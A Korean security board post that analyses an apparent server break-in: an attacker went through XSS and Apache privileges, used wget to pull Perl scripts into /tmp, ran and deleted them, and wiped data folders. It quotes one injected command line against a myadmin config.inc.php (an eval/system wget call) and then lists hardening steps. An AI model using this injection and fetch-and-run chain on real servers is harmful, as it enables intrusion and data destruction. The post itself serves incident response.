VIRHAC



크게 작게 인쇄

서버 침투 예상 경로

서버 예상 경로 Xss 취약점 > Apache 권한 > curl, wget 이용 perl 다운로드 > /tmp/ 에서 perl script 실행 > data,member,inc,notice 하위폴더 데이터 삭제


특이사항
perl cpu점유율 과다
/tmp/ perl 소스 생성
/var/tmp/nc.jpg(내용은 perl)
Apache error_log에 wget를 이용한 perl 다운로드 흔적 netstat 중국 ip연결시도 확인

추가
혹시나 역시 XSS(Cross-site scripting)으로 wget으로 /tmp 디렉토리에 외부사이트에서 perl을 내려 받은 후 mv를 이용해 p1.txt, p2.txt, p3.txt 으로 바꾼 후 perl p1.txt 로 실행 후 rm -rf *.txt 로 삭제했다.

/myadmin/config/config.inc.php?eval=system("wget ...")식으로 공격 지점을 포착했다.

조치
아직 완전하게 분석된 결과치가 아니라 wget,curl 권한 700 및 /usr/bin/perl 또한 700으로 변경 되었다.
/var/secure 및 lastlog, last 및 ftp 접속 흔적과 더불어 data 업로드 부분에서 확인된 흔적은 없었다.
wget 및 curl은 관리 입장에서는 편하지만 악 이용되는 경우인거 같다. 또한 myadmin의 경우에도 mysql을 관리하기 위해서는 편하지만 이러한 공격범위를 주게된다.
때문에 myadmin 접속을 인증을 거치게 하거나 관리 ip 외에는 차단 하는 방법이 좋겠다.
코멘트 0
바이러핵 | 전체게시물 52
안내

포인트안내닫기

  • 글읽기0
  • 글쓰기0
  • 댓글쓰기0
  • 다운로드0
바이러핵리스트
번호 제목 등록일 조회
52 텍스트 03-27 440
51 텍스트 11-15 676
50 텍스트 03-30 923
49 텍스트 11-21 1136
48 텍스트 10-20 1215
47 텍스트 12-08 1458
46 텍스트 04-01 4018
45 텍스트 02-28 3690
44 텍스트 09-06 10738
43 텍스트 08-20 4617
42 텍스트 08-20 6444
41 텍스트 08-15 4423
40 텍스트 10-25 6215
39 텍스트 05-09 2045
38 텍스트 03-11 2609
37 텍스트 링크 02-26 2579
36 텍스트
서버 침투 예상 경로
02-10 2387
35 텍스트 01-28 2505
34 텍스트 12-16 2927
33 텍스트 12-10 2549
 맨앞이전123